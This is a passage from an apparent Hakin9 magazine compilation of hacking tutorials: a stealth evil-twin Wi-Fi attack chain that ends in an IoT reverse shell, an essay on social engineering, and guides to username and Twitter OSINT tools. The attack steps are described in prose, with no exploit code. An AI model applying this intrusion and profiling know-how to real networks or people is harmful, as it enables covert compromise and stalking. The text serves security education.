Best Hacking Tutorials in 2022

TEAM Betatesters &
Editor-in-Chief
Joanna Kretowicz
Proofreaders
joanna.kretowicz@eforensicsmag.com
Lee McKenzie
Managing Editor
Hammad Arshed
Marta Sienicka
sienicka.marta@hakin9.com Avi Benchimol
Editors: Amit Chugh
Marta Strzelec Kevin Goosie

marta.strzelec@eforensicsmag.com
Craig Thornton
Bartek Adach
bartek.adach@pentestmag.com Paul Mellen
Michalina Szpyrka Daniel W. Dieterle

michalina.szpyrka@eforensicsmag.com
Alex Giles
Proofreader:
Lee McKenzie Filipi Pires
Senior Consultant/Publisher: Matthew Sabin

Paweł Marciniak
Jonathan Ringler
CEO:
Joanna Kretowicz Gregory Chrysanthou
Alexandre D’Hondt
Marketing Director:
Joanna Kretowicz Steve Hodge
Shanika B
DTP
Marta Sienicka
David Molik
sienicka.marta@hakin9.com
Gilles Lami
Cover Design
Hiep Nguyen Duc
Girshel Chokhonelidze
Joanna Kretowicz
Publisher
Hakin9 Media Sp. z o.o.
02-676 Warszawa
ul. Bielawska 6/19
Phone: 1 917 338 3631
www.hakin9.org
All trademarks, trade names, or logos mentioned or used are the property
of their respective owners. The techniques described in our articles may
only be used in private, local networks. The editors hold no responsibility
for misuse of the presented techniques or consequent data loss.
Dear readers,
We would like to present you with a special edition of Hakin9 - we gathered our best
20 hacking tutorials from last year in one place. The articles are focused on different
topics such as Mobile hacking, attacking smart devices, phishing campaigns, Wi-Fi
hacking, OSINT tools in practice and many more. Inside you will find more than 200
pages of “how-to” and “step-by-step” tutorials that will surely contribute to your
development as a professional pentester or ethical hacker.
Stay safe and enjoy!
Magdalena Jarzębska and Hakin9 Editorial Team

3
4
5
6
7
STEALTH
CHAINED WIFI
ATTACKS
ROBERTO CAMERINESI
Roberto Camerinesi is a computer security researcher and
developer.
Embracing the philosophies of ethical hacking since
adolescence, he has been working for over 11 years in the ICT
and security industry.Today he is CTO of Cyber Evolution,
working specifically on cyber security in IoT and In- dustrial
environment.
He believes that security should be a concept that accompanies
digitization, so he spreads and studies systems to capillarize
security, inventing and pat- enting air-gap defense systems.
9
Stealth Chained WiFi Attacks
“Obtain persistence without leaving traces.”
Greetings readers,
Wireless has revolutionized the way we can be connected, opening the way to countless application fields.
We find it, in fact, from home networks to public networks but not only; it is used in companies supporting the BYOD
(Bring Your Own Device) model and working methods and today it is coming in Industry 4.0 and sensor networks.
An important note deserves to be mentioned, that of IoT and automotive. The exponential growth of these two sectors has
given a boost to wireless networks, connecting all kinds of devices, from smart TVs to automatic opening garages.
Born in Hawaii in 1971 with the Alohanet project and then became an IEEE standard around 1997 with 802.11a. The wave
frequency used for communication was initially equal to 2.4Ghz, well above 4G - today’s cellular connections, for example,
which work at about 2.6Mhz, but then, obviously over time, the standard 802.11 has evolved, with important breakthroughs
such as the implantation of MIMO technology, which allows you to expand "physically" the band using multiple antennas
and multiple receivers and the support of 5Ghz (as before it was reserved for some use and in some specific country).
All the implementations and improvements that concern the transmission of wireless networks are collected in
nomenclature instead of using IEEE acronyms. Today we are in fact in the Wi-Fi 6 standard and we are going towards
Wi-Fi 7, always with more bandwidth, optimized consumption and performance in terms of latency and security.
In short, its use and continuous evolution does not stop, considering that today there are estimated to be over 500 million
hotspots in the world. The capillarity is disarming as reported by WiGLE ( https://wigle.net/ ) in the single portion of New
York:
10
So much extension, it means a wide surface of attack for a cracker.
One can immediately notice how this widespread technology has led to the creation of LAN perimeters "outside the walls".
What before would have been protected, at least in physical terms, inside the perimeter, with the wireless implementation,
any wired network extends its reach becoming ethereal and propagating the signal even hundreds of meters.
For this reason, different technologies are implemented to protect wireless networks, such as encryption systems. Initially,
WEP was used, now deprecated and giving way to the recent WPA family, such as WPA2, WPA2 Enterprise (with improved
authentication for well-managed areas) and the still little used WPA3. Just as the scientific community has moved to raise
security, the other side has moved to breach it. In fact, many attack techniques were born to directly violate wireless
networks.
The most popular are the techniques of password cracking, stealing the handshake (packets that initialize connections
similar to TCP) of authentications and then forcing the encryption.
WIFI (AND NOT ONLY) AS A STEALTH VECTOR
It is clear then that wireless protects itself in various ways using more or less powerful encryption methods, but the fact
remains that believing that wireless is impregnable can be a serious mistake.
In this case, however, we are going to analyze an attack that is a bit more complex, carried out with a different goal from the
usual "WPA crack", the goal will be to chain a Wi-Fi attack to obtain persistence in a LAN physically far away, using
the transmission power as a vector, and thus violate that network in the most stealthy and invisible way possible.
ATTACK OVERVIEW
Generally, when a cracker wants to violate a wireless network, attacks known to WLAN are exploited, often related to the
cracking of WEP, WPA, WPA2 keys stolen in the ether. In any case, it is always a "direct" attack and, as such, noisy in terms
of logging and suspicious movements by those who deal with internal security. This, in fact, involves movement and LOG
generated by the access point that would report a new MAC address of the attacker's Wi-Fi NIC, alerting everybody of his
presence and leaving traces.
Would there be a way to get persistence in network access in a much stealthier way? The answer is virtually yes.
To remain hidden, to generate no LOG related to the intrusion is always the goal of a cracker.
Less alarms = less problems in movements.
Having said that, the identified goal is to access the target network, leaving as few traces as possible and at the same time
trying to obtain persistence. It seems a very difficult thing, but it is plausible. For this, a series of chained attacks must be
exploited, exploiting 802.11 not as a target, but as a vector.
11
In the heart of the attack we find a technique already known as "Rogue AP", which consists of spoofing a real Access Point
to make the target device connect to its own access point.
But remember, that the goal is persistence in the network, so we must go further, concatenating this vector to further moves
both in terms of firmware and exploiting.
Disclaimer: The PoC of attack techniques in this article is for didactical purposes and for authorized research purposes.
Breaching computer networks is a crime.
THE ATTACK CHAIN
For better understanding, the attack can be divided into several phases, below:
1. Rogue AP with high transmission power (Tx)
2. “De-auth” technique against the target IoT
3. The target IoT will connect to the Rogue AP
4. Exploiting the IoT
5. Remote Shell & Persistence
12
Required:
Basically, two network cards: one with internet connection and an additional wireless network card, which also lends itself
to firmware changes.
● The aircrack suite. Here is the documentation: https://www.aircrack-ng.org/doku.php?id=Main
● A Kali Linux OS is used. - https://www.kali.org/
● Legend in screenshot:
o lan1 = target network
o On left-side:
3 macro-step of this attack
Phase 1 - Prepare
It is necessary to initially perform a phase 1 of Information Gathering for the interesting wireless networks. To do this you
need to set your network card in "monitor" mode, this is because in this way we can pick up any network and clients
connected, a bit like if we were in promiscuous mode on a wired NIC.
Generally, first create a network with a name like "wlan0mon" to identify it; to simplify, I renamed the card simply to
wlan0.
Now, let's go do some recon on channel 14.
In this way, we will have, for example, an output like this:
Rogue AP's method allows you to create a "fake" network on a cracker's network card by providing arbitrary ESSID and
BSSID as input for creation.
13
Specifically, the technique in question is called Evil Twin. As you can see below, we can insert the cloned BSSID and ESSID
by copying it manually from the data taken, thanks to airodump-ng. By doing this, our network card will create an Access
Point in all respects equal to the original.
Now, with certain modifiable firmware on the antennas, you can theoretically increase the transmission power, thus
increasing (if not exceeding) the DB of the real access point.
The cracker, then, could increase the Tx power beyond the limits to be more distant from the target network.
Obviously, it is illegal to increase the signal power beyond the limits of the law of the state of belonging.
Thanks to the airbase tool, at this point, a virtual AP "at0" has been recreated, similar to the target ESSID network from a
user's point of view.
Indeed, in terms of power, even higher.
Now you will have to do some "bridging" with the other network card of your own (i.e. not the one we are using for the
cracking stages). I have arbitrarily given a bridge the name "bridge”, thus enabling a DHCP service in order to assign the IP
address to the target IoT device. All these operations can be performed in different ways. I used the "ip" suite.
The reason for bridging?
It makes sense both in terms of attack success and in terms of having more leeway for subsequent phases (example cloud
credential sniffing) by lowering the possibility of "human" detection. See in the following paragraphs about phase 4,
exploiting.
Enabling a DHCP Demon allows the client to obtain an address, just as if it were connected to its normal AP.
14
For convenience, you can play with "ready-made" tools, such as berate (https://www.kali.org/tools/berate-ap/).
root@kali:~# berate_ap -h
Usage:
berate_ap [options] <wifi-interface> [<interf-with-internet>][<access-point-name>
[<passphrase>]]
Phase 2 – Doing some deauth
After performing these preliminary network operations to create the backend of the attack, the cracker proceeds with
phase 2, i.e. trying to deauthenticate the target IoT from its normal connection, thus trying to make it connect to the
Rogue AP with the same name created by the Evil Twin technique.
This is where the transmission power that is already anticipated comes into play: the more powerful the Rogue AP, the
further away from the target you can be, as well as having a greater chance that the network card of the target IoT device
connects to the Rogue AP.
This happens thanks to the default configurations of network card drivers or OS that, all things being equal, obviously
choose the 'AP’ more powerful to have more connection.
To deauthenticate hosts connected to a BSSID, forcing a reconnection, use another component of the aircrack suite, the
aireplay-ng, entering the attempts to be made and the BSSID target (in this case the BSSID of lan1):
Phase 3 – Waiting - the automatic phase
At this point, in phase 3, the target IoT will attempt to reconnect to its network, choosing however, this time the most
powerful one, namely the Rogue AP with the same name and ID.
Phase 4 – The Art of Exploit
Once the device has connected to our network, the field is open for phase 4.
It's time to try to compromise it, by exploiting popular RCE or simply trying to change the configuration of the device that
may have been left with default access credentials (admin: password), all with the precise purpose of injecting a shellcode.
15
This kind of credentialing is not uncommon, just think of the damage that the Mirai botnet has created,
and with this low-hanging-fruit weakness, we can upload compromised firmware, or simply modify DNS or other network
parameters useful for the exploit.
It could be infinite scenarios in short, with IoT devices of all kinds, from outdated (and unpatched)
Linux-based camera DVRs, or other networked devices, perhaps with old unpatched versions of services.
At this stage, you can use the entire possible arsenal in terms of compromising more or less creative devices as if you were
on a LAN.
For example, for an IoT device, these are dangerous vulnerabilities about CCTV Cameras:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260
As reported above:
“A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation,
an attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious
commands.”
Alternatively, you can also sniff the traffic generated by the target device, with the intent of sniffing possible passwords
during authentication to cloud servers and the like and exploit further command channels. Given the wider spread of
wireless devices, in this article I’ve used generic IoT to indicate any device, but it could also be a laptop or a smartphone!
In this case, it is possible to use a very powerful tool for browser exploitation like Beef (https://beefproject.com/) or, in
another case, a MITM attack can be used. In any case, the goal in this phase remains the same: to obtain a reverse shell.
Phase 5 – The remote silent shell
Once we obtained this shell, we arrived at step 5, so we can turn off the Rogue access point, so that automatically the target
device connects again normally to its network.
At this point, we wait for its reconnection (reverse-shell approach), using, for example, a handler listening on Metasploit
(https://www.metasploit.com/).
In this case, I used a generic handler, but obviously it depends on the type of payload we have loaded on the victim IoT.
16
COMPLETE.
Now you would have control of a host in a remote network, without AP or internal measurements having detected anything.
All of this implied that physically we didn't attack the wireless network, as it simply seems that a device went offline for a
few minutes.
Inside the network, therefore, the insertion of a new MAC and its IP will not be notified, since physically in the network,
there are the usual wireless or LAN devices.
In this example, we have used a target device as IoT in the general sense, but it is possible to perform the same operations
on devices such as notebooks. Obviously, the scenario changes at the point of exploitation, with advantages and
disadvantages from an attacker's point of view. This is because if it was a notebook, for example, and a user is surfing, you
could force redirects or do DNS poisoning in order to exploit additional vulnerabilities or techniques, making detection
complex here too, as the user would only notice a short network disconnection during the de-identification phase.
HOW TO DEFEND FROM THESE POSSIBLE ATTACKS
It's clear that it's an articulated technique and if used properly it becomes really dangerous. It is therefore essential to have
a very accurate management of wireless networks, using WPA2-Enterprise encryption. In addition to encryption, it is vital
to have firewall systems in the first place, as it would be possible to monitor the traffic of the compromised device to the
outside, or better to say to IP addresses not suitable or never contacted before. In fact, very often, IoT uses the usual
connections and we can notice possible anomalies.
In support of this, IPS/IDS systems are used to verify internal movements. If the detection phase of the firewall fails, we
can notice the local movements on the LAN, such as lateral movements, that a cracker makes using pivoting techniques and
the compromised IoT as a vector.
17
HOW SOCIAL
NETWORKS ARE
DIRECTLY
CONNECTED WITH
THE IMPROPER
APPLICATION OF
SOCIAL
ENGINEERING
FELIPE HIFRAM
He is currently an information security professional focused on
habits of good use and privacy on the Internet. He has done
work for companies in Brazil, Ukraine, Oman and Bahrain, in
addition to writing several other articles.
19
How Social Networks Are Directly Connected With The Improper Application of
Social Engineering
"Privacy for the weak, transparency for the powerful!"
(Julian Assange)
SOCIAL ENGINEERING, A BRIEF INTRODUCTION
At some point in your life, when checking your emails, you came across "your bank" asking you to reset your account
password, or perhaps, some raffle result where you would have been the winner…
These and similar cases are already well known (although they still work), what really matters here is the root of this type of
attack, the purpose of inducing people to provide data and information. An attack that affects ordinary people and even
large corporations.
Social Engineering is defined by attacks that dispense with the use of technologies, focusing only on obtaining, through the
lack of security policies of a company, valuable information, usually commercial.
SOCIAL NETWORKS, A DOOR TO SCAMS
Imagine yourself as a developer for a large technology company, you are currently working on a new project that promises
to revolutionize your company's niche.
On a Friday, after work, you decide to go to a bar for a cold beer and rest from the busy week in your leisure time, until you
are interrupted by someone who claims to have recognized you through Facebook or Instagram and who characterizes your
job as “how incredible”. You automatically, like most people, find this interesting (after all, it's a compliment) and allow
that person to come closer.
"Today with social networks, people tend to be more easily manipulated, through a common weakness, vanity."
Returning to your character... The person you know presents himself as a professional in his area, demonstrating in-depth
knowledge in defense of what he says, and here you already established a bond by professional affinity.
"Usually, social engineers - very good at manipulation - can guide the conversation to get the information they are
looking for, making it seem natural."
As a result of the ingenious gift of the manipulator, you want to impress him even more, and show him how amazing you
and your work are. Then comes the moment when the attacker asks, in a harmless tone: "But then, what are you working
with at the moment?"
At this point, by revealing details of the project you're working on, you put the company you work in at risk, revealing
business information that can easily now be sold to competing companies, which could result in financial losses for yours.
To give an example of the consequences and facilitate understanding of the problem, I will create an assumption:
Today Apple has its Chip M1 [an entire system, in addition to just processing, is included in it], currently used in its
MacBook; the launch of this technology revolutionized the market, making its products much more attractive.
20
Social Engineering
Now imagine if Apple had not invested in security policies for employees and one of them had naively gone through a
situation similar to the one described here, revealing details of the development of the Chip M1. This information could be
sold to the competition, resulting in a totally different scenario than we know today. Apple would not have revolutionized
the market, a competing company would have developed and launched its own chip before it, causing Apple to lose space
and the title of pioneer in this technology.
ARE ALL POTENTIAL TARGETS?
It is usually to be expected that people who hold important positions will be targeted by malicious social engineers more
often, but nowadays, we even have cases of botnets responsible for sending tens of thousands of phishing emails – for the
purpose of stealing personal data – and even if the email is not the best, victims always fall, yielding data that may be sold
or used to carry out other crimes in the future.
With social networks it is also much easier to recognize the target. People usually post their entire personal lives on their
networks, and even worse, they do not control who can access this information, a public profile in which intimate details of
the information are stored about someone's life. It's a full plate for criminals.
In your Instagram feed we can find out where you go to have fun or where you travel on vacation, in the stories we can learn
what time you work, study, what you do on a daily basis and, in some cases, even your emotional problems;
On Facebook, we can determine when you are out and where you are, we can know what pages you like, what kind of music
you like, your religion, age, who you relate to, your sexual choice, your hobbies, who you are friends with;
On LinkedIn we can know where you work, map the hierarchical structure of your business, find out what position you
occupy, discover your co-workers.
So yes, we are all potential targets, whether to steal data or information, with classic social engineering (phishing email or
very attractive promotion), or as in the case described in this article, where a malicious professional will personally apply
the blow.
PROBLEM IN NUMBERS
To prove what is written in this article, I will mention some research and statistical data that prove the degree of
dangerousness of Social Engineering:
In 2018, a survey by Verizon (an American phone company) found 41,686 cases of security problems in that year alone,
and 33% were social engineering attacks.
Fake accounts can also serve as a means for attackers to communicate with their victims, and according to a 2016 report
published by Facebook, we have about 31 million fake accounts, as a percentage of 2% of monthly users of the social
network.
21
Social Engineering
The security company, Kaspersky Lab, decided to conduct a questionnaire with internet users and found that 30% of social
network users share personal information, locations and posts with unknown people.
Already, a report from the company Positive Technologies showed a percentage of successful social engineering attacks.
They sent about 3,300 emails to employees of various companies and came up with the following result:
17% of all emails were successful, which could lead, for example, to compromise an entire company's
infrastructure.
27% of the targets clicked on a link sent via phishing email, showing ignorance about security and proving a
potential vulnerability.
It is also important to note that Social Engineering does not have a standard way of being applied, it can even be through
malware, worm, network, fax, phone connection, SMS, URL, Baiting, cyberattacks such as DNS Spoofing, in addition of
course, the most common, phishing email. What do most of these attacks have in common? They all explore the emotional
side of people, for hackers of the mind, social engineering is an art.
HOW TO PROTECT YOURSELF
To begin, I will quote a list of habits that all users, whether they are from social networks or not, must have to reduce their
vulnerability on the internet:
Never click links coming from emails or SMS that you didn't expect.
Use secure passwords that are unrelated to your intimate life, such as dates of birth, family names, your movie,
music, series, singer, or favorite book, meaning nothing that has the potential to be discovered by anyone who
searches for you and your tastes.
It is important to maintain 2-factor protection on all your accounts where this is possible, this ensures an extra
layer of protection through an SMS, PIN or fingerprint.
Never share information about your day-to-day life over the internet, mainly including the name of places you
usually frequent, your location. This can help criminals create more compelling contexts to deceive you.
Be cautious when meeting people, whether in person or on the internet, never say face-to-face everything about
you, your work, family, college and any other more privileged information that can be used against you in social
engineering attacks.
Suspect, even if minimally, enough to avoid headaches (with phishing).
Never share your Wi-Fi network with people you've met recently.
To add to the previous tip, it's also a good idea not to use public Wi-Fi networks, and if you have to, turn on a VPN
while browsing.
22
Social Engineering
Security is not just with mobile and computer, ensure that other devices such as printers and routers are up to
date with their systems and properly configured.
Keep all your software up to date. Updates usually contain important repairs that aim to ensure better security for
users.
Caution when downloading pirated content from the internet (the recommendation is not to download).
Review people who have access to your social media posts, preferably leave your profile private.
Deprive streaming apps of showing what you watch or hear.
Now talking a little more about ways to protect yourself, but focusing on attacks on your psychological (mind hacking): In
addition to good account management, attention to emails and SMS, you should rethink your online communication habits
(especially online), but also physically.
Speaking a little for myself, I discovered my potential as a social engineer well before I learned to work with computers and
people security, since I was younger I had the potential, for example: to guide a conversation and make the person tell me
what I wanted to discover, or practice so-called reverse social engineering, when you don't approach the person, but open
the way for them to reach you. When I was younger I thought it was just "talking well" and I used this to win over some
girls, hahaha. After a few years of professional study of the application of social engineering, I discovered that people are
naturally vulnerable and that in order for companies to have the chance to keep their projects confidential, they need to go
beyond privacy clauses, it is necessary to implement a privacy policy, provide training to all employees and periodically test
them by hiring specialized pen-testers.
BIBLIOGRAPHY:
1. https://www.avira.com/pt-br/blog/dia-mundial-das-redes-sociais-o-que-voce-deve-saber-sob
re-engenharia-social
2. https://www.passeidireto.com/arquivo/37524509/engenharia-social-nas-redes-sociais-phish
ing-na-pratica
3. https://www.kaspersky.com/resource-center/definitions/what-is-social-engineering
23
LIGHTNING
FAST PROFILE
LOOKUPS
USING NEXFIL
LOHITYA PUSHKAR
(THEWHITEH4T)
Security Assessment Engineer and Community lead at The White Circle. I have
created multiple open source tools for the infosec community. You can find my
projects on GitHub. Please give them a star if you like my work. I am currently
learning and practicing Red Teaming, Network Penetration Testing and OSINT.
Blog : https://thewhiteh4t.github.io
GitHub : https://github.com/thewhiteh4t
Twitter : https://twitter.com/thewhiteh4t
LinkedIn : https://www.linkedin.com/in/lohityapushkar
Discord : https://discord.gg/UM92zUn
25
Lightning Fast Profile Lookups Using NExfil
In this day and age, the internet is widely populated with social media platforms. Some are well known and used by the
majority of the people; meanwhile, some have lost interest of people as they move to newer platforms, and there are new
platforms being launched every year. During OSINT investigations, usernames are like seeds from which new branches
open up in an investigation and we can get loads of information. All these platforms help in their own way, each platform is
capable of displaying something that might help an investigator. Some show joining dates while others can reveal birthdays.
We can check five or ten websites manually but after a certain point it becomes repetitive and exhaustive. I believe that
OSINT investigations are best done manually but I also believe that tools can give us an edge. Tools can automate the
workflow and greatly reduce the time of certain tasks such as user profile lookups on a given username. If you have
performed profile lookups before then I am sure you will be aware of some existing tools for the same. Some honorable
mentions are instantusername.com and sherlock. Profile lookup tools are available on both websites as well as command
line tools. I personally prefer and recommend command line tools due to the fact that they offer more control over the tool.
WHAT IS NEXFIL?
NExfil is a new free and open source profile lookup tool written in Python. The goal of NExfil is to fetch accurate results
quickly, which means low amounts of false positives in a short amount of time. It comes loaded with over 350 social media
platforms, which can be expanded. Most of the popular social media platforms have been added and tested for accurate
results. The nature of the tool is modular so it is very simple to add new modules or new websites to the pool for going
beyond the current count.
WHY I CREATED NEXFIL
I play a lot of capture the flag competitions to practice my cyber security skills and to gain more knowledge. Fortunately,
new CTF competitions are acknowledging OSINT and have started including it as a category of its own. This is great
because now we can practice our OSINT skills as well, and so far in each competition, I found myself using some sort of
profile lookup tool, mostly the ones I mentioned before, i.e. instantusername.com and sherlock. If you have been using
them then you know there are certain issues with both. Let's talk about instantusername first. It sticks to its name and it is
very fast, which is great, but it has support for about 100 social media platforms, which is decent, but then comes the major
issue of false positives. CTFs have a time limitation and the way the challenges are created, we end up finding a needle in a
haystack. False positives really pull us back from reaching the goal because it increases the time and effort we put into
checking the results. Eventually, I switched over to sherlock. One major benefit of command line tools is that the tools are
immediately accessible, you don't need to open some GUI application or browse to some website, which is why I prefer
most of my tools in command line mode instead of a graphical user interface. Sherlock is a very popular tool but it has its
own set of issues. It is actually slow, which is again not what we want and it has the same major flaw like
instantusername.com, it has lots of false positives and it does not depend on the username you input, you can input any
random non existent username and it will show you results, which obviously do not exist.
26
So it took about 2 minutes and 16 seconds to show 8 false positive results. The results are similar if I use a valid username.
So as you can see, some valid results along with false positives in 2 minutes 18 seconds.
27
Now let’s see NExfil in action.
As you can see above, I got accurate results, i.e. 0 results, since the username I entered was completely random and
non-existent, and in just 16 seconds, 351 URLs were processed. Now let us check a valid username.
28
Twenty profiles were found by NExfil and all are correct, that means zero false positives and if you look at the time taken,
it's just eight seconds.
FEATURES
NExfil is still in its early stages of development but completely usable. The current feature set is small but I am working on
new features and they will be added soon.
Speed: as you can see in the demonstration above, NExfil is capable of completing the lookup within 20 seconds,
there is a command line option for increasing or decreasing this duration depending on your network connection
Over 350 social media platforms are supported. Feel free to add more to the list to increase the pool even further
Batch processing
Multiple usernames can be provided by a comma separated list
Multiple usernames can be provided from a file which contains a username list, i.e. one username per line
29
Results are automatically saved in a TXT file and the path is displayed to the user for easy access. The formatting
of the TXT file is simple so it can be easily parsed by the user if required
FEATURES IN DEVELOPMENT
Two important features are in development right now:
More file formats for output such as JSON and CSV. Currently, the tool only outputs TXT but soon users will have
the option for other formats.
Proxy and TOR support. Maintaining anonymity and sock puppet during an investigation is a crucial part, which
is why this is one of the most important features I am working on currently and it will be available soon.
HOW IT WORKS
NExfil makes use of concurrency to achieve the great speed you just witnessed above. I have tested all of the included
websites and created certain test cases. These test cases are an important part of the tool because they are responsible for
maintaining low or zero false positives. Each website is built differently and behaves differently, one test case does not work
for all websites so, while I was writing the tool, I created a set of test cases that support most websites. There is a good
chance that if you add a new website, one of the test cases will be enough to verify and filter false positive results. Some
websites send a 404 status code so they are easy to process and they are consistently accurate. Meanwhile, some websites
send 200 OK status codes even if a profile does not exist. In this case, NExfil finds an error message string such as “Profile
not found” in the given website to verify if the profile actually exists or not. Similarly, there are other test cases for different
situations that help in maintaining the accuracy. Here is an example for Archive.org :
INSTALLATION
NExfil is created for Linux and it requires Python 3.9. Please make sure you have Python 3.9 and PIP ready and working
before proceeding. Other dependencies are quick and easy to install. Here are the steps to install it in your machine:
$ git clone https://github.com/thewhiteh4t/nexfil.git

$ cd nexfil
$ pip3 install -r requirements.txt
30
USAGE
$ python3 nexfil.py -h
usage: nexfil.py [-h] [-u U] [-d D [D ...]] [-f F] [-l L]
[-t T] [-v]
nexfil - Find social media profiles on the web | v1.0.0
optional arguments:
-h, --help show this help message and exit
-u U Specify username
-d D [D ...] Specify DNS Servers [Default : 1.1.1.1]
-f F Specify a file containing username list
-l L Specify multiple comma separated usernames
-t T Specify timeout [Default : 20]
-v Prints version
Whenever in doubt consult the help menu. You can check the current installed version as well as other options to fine tune
the tool. More options, such as output formats and proxy settings, will appear here in the future.
Here are some example commands to get you started:
Perform a single username lookup:
$ python3 nexfil.py -u username
Multiple *comma* separated usernames for batch lookup:
$ python3 nexfil.py -l "user1, user2, user3, user4"
Multiple usernames from a file for batch lookup:
$ python3 nexfil.py -f users.txt
The contents of the file should be in a fixed format of one username per line. This is the standard format for all wordlists.
For example:
$ cat users.txt
adam
jensen
thewhiteh4t
john43
If the username file is in some other directory then you must provide the absolute path to the file like this:
31
$ python3 nexfil.py -f /home/your_username/Downloads/

user_list.txt
You can also use custom DNS servers to resolve the queries, by default Cloudflare DNS is used. Here is how you can specify
your own:
$ python3 nexfil.py -u user1 -d 8.8.8.8
Similarly, you can increase the timeout if websites are not responding fast enough. By default, the timeout is set to 20
seconds which should work but otherwise you can set the value:
$ python3 nexfil.py -u user1 -t 40
NExfil displays the settings used in a session before it begins processing:
UPDATES
Updating NExfil is super simple, you just need to head over to the directory where you cloned the project and execute:
$ git pull
And it will be automatically updated. NExfil will also notify about new versions if any is available so you will know when to
update.
FUTURE OF THE TOOL
Currently, I am focused on the core functionality of the tool, i.e. speed with accuracy and low amounts of false positives.
Along the way, I plan on adding more websites to expand the arsenal of NExfil. If you have any suggestions or if you want to
get some websites added to the tool then feel free to head over to GitHub and contribute.
32
TWITTER
OSINT USING
TINFOLEAK
AND REVERSE
IMAGING
JEFF MINAKATA
Trained in CEH8 and CEH9, CISP, Metasploit certified,
Accredited Certified Engineer (ACE), and CWA certified. Over
20 years’ experience in the IT industry. Online instructor for
OSINT, ethical hacking, and network security. Has contracted
courses for EC-Council and has written articles for Hackin9 and
eForensics magazine. keyboardkomando@protonmail.com
34
Twitter OSINT using Tinfoleak and reverse imaging
In this article, we will be talking about using OSINT for our Twitter investigations. We will be breaking this up into two
sections, the first section is information collection on Twitter and the second part is verification of that information.
To follow along with this article, you will need a web browser and an internet connection. We will be using browser based
tools for this tutorial.
The goal of this article is to understand how we can leverage online tools to collect information on Twitter users and also
some tips on analyzing a post that may be misleading.
The website that we will be using is TINFOLEAK (see the On the Web section for the link). This site will help us collect a
variety of information from our target’s Twitter account all in one place.
35
The site’s operation is pretty simple. If we scroll down to the bottom, we can enter the target’s Twitter handle right after the
@ in this example we are using Hackin9. Next we need to enter in an email address for the report to be sent to (the site
claims that you will not be spammed or have third parties involved). Finally, we need to solve the CAPTCHA and click the
Send button.
Once this is done you will see a verification at the top that you will receive your report by email. This can take several
minutes to get. If you do not see an email after 15 minutes or so, check your spam folder.
In your email you will receive an email from the site along with the IP of the requester and the URL to check the results of
the scan.
36
Once we click our custom link we will be presented with a wealth of information on our target in an easy to read format.
Account creation date, Twitter ID number, location, geo location (if enabled), tweets, mentions, likes, metadata, etc.
With the information that we are able to obtain through TINFOLEAK we can easily pivot our investigation following up on
followers, posts, isolate posts and likes by dates and time and more. We can also see from our report that an Apple
computer was used on 2014/07/24 at 14:17:26.
37
Another common problem with performing OSINT with Twitter is the authenticity of the post. In this example we see a
fairly recent post that Joe Biden has his Ukraine compound raided by Delta force. Some of these Twitter posts included an
image of the supposed Delta Force team during their raid.
38
Likely, the previous Twitter post is referencing this “news” story that shows a Delta Force team raiding a compound with
their night vision goggles. By performing a Google search for “Joe Biden compound raided by delta force” we can find this
article. We can also see that the date stamps are pretty close to the Twitter postdate.
By running a reverse image search we can see if that image was used somewhere else. By using a service such as Google
images we can upload the image and see what we can find.
Right away we can see that the supposed image was from the movie Zero Dark Thirty! The images are an exact match to the
movie’s promo images, not from a real life raid.
39
If we continue our reverse image search and keyword search, we can see that the almost exact same story was reported back
in 2017, however it was Obama’s stronghold in Thailand. The images and content is an almost exact copy word for word as
the Biden story.
Furthermore, using fact checking sites, such as Snopes, we can easily enter in our keywords and see if it has any results. In
this case, we see that Snopes has already debunked this story.
40
In our final example we take a look at this Twitter post made the day of the capitol riots. This individual, who would later be
identified as the “QAnon Shaman” was quickly noticed among the crowd that stormed the capitol. Not long after this
individual was noticed, stories began to circulate that they were a provocateur from BLM sent to storm the capitol under
the guise of a Trump supporter. The Twitter post above shows the split images, the one on the left makes it appear he is at a
BLM rally in support. In fact, if we try clicking the image on the left the image is cut off there.
41
Once again if we do a reverse image search, we can search for the original image. In this case we are able to find the full,
uncropped image along with the sign that they are carrying. We can see clearly it is not in support of BLM, rather a message
that “Q” sent them.
Continuing our reverse image search we can find a video where the individual states they are at the rally to support Trump
and Q theory. This goes to show how easily a simple cropped image can be twisted to represent something very different,
and we need to always be sure to verify our information.
CONCLUSION:
Social media OSINT is constantly expanding with so many new ways for people to communicate constantly being
introduced. Twitter, with its some 192 million active daily users, is still a very viable place to collect your OSINT
information. Leveraging such tools as Tinfoleak and also employing reverse image searching and keyword searches can help
42
not only identify more about your target, but also verify the incredible amount of information that floods the platform,
including false and misleading posts.
On the Web:
1. https://tinfoleak.com
2. https://www.google.com/imghp?hl=EN
3. https://www.bing.com/images/
4. https://www.snopes.com
43
HACKING
IOT WITH
IOT
DANIEL W. DIETERLE
Daniel W. Dieterle, aka “CyberArms”, has been in the computer
industry for over 20 years, and has worked as a security author,
researcher & consultant. He has authored six books based on
Kali Linux, and is currently working on his seventh, “Advanced
Security Testing with Kali Linux”. Daniel also runs two tech blogs
- cyberarms.wordpress.com & DanTheIOTMan.com
45
Hacking IoT With IoT
IoT (Internet of Things) vs IOT - reminiscent of the old Mad Magazine “Spy vs Spy” cartoon where there were two
identical-looking cartoon spies of different colors that were always trying to kill each other. The rise of vulnerable deployed
IoT devices and the offensive use of IoT devices is skyrocketing. In this article, we will cover attacking an IoT device, an
office building security camera system, with another IoT device, a Raspberry Pi.
IOT DEVICES - WHAT ARE THEY?
An IoT device is a physical device with intelligence (sensors, data collection, monitoring) that communicates with other
devices over the network. IoT devices include security systems, smart appliances (online TVs, refrigerators, coffee makers,
etc.), building and machine control, monitoring devices, scanners, and sensor arrays that are accessible over the Internet.
Many “Maker” boards like the Raspberry Pi and Arduino are also used frequently in IoT applications. For this article, we
will specifically focus on the Raspberry Pi and a Smart Camera security system.
VULNERABLE SYSTEMS - WHAT PEOPLE DON’T UNDERSTAND
IoT devices are so popular because they bring online connectivity and monitoring to almost every industry. The large
problem, and what people don’t understand, is that there is a mini web server hiding inside them, and it is usually Linux
based. Once an IoT device is deployed, many times it gets forgotten. It just sits on the wire, collecting or monitoring, and
not usually getting updated. Security monitoring IoT devices are still fairly uncommon in the business world, and as we say
jokingly in the Red Team world, “they don’t make anti-virus for refrigerators”. This makes them a prime target for unethical
hackers.
46
FINDING IOT DEVICES IN MERE SECONDS
Shodan.io makes finding deployed IoT devices worldwide effortless. With just entering a few keywords, Shodan will return
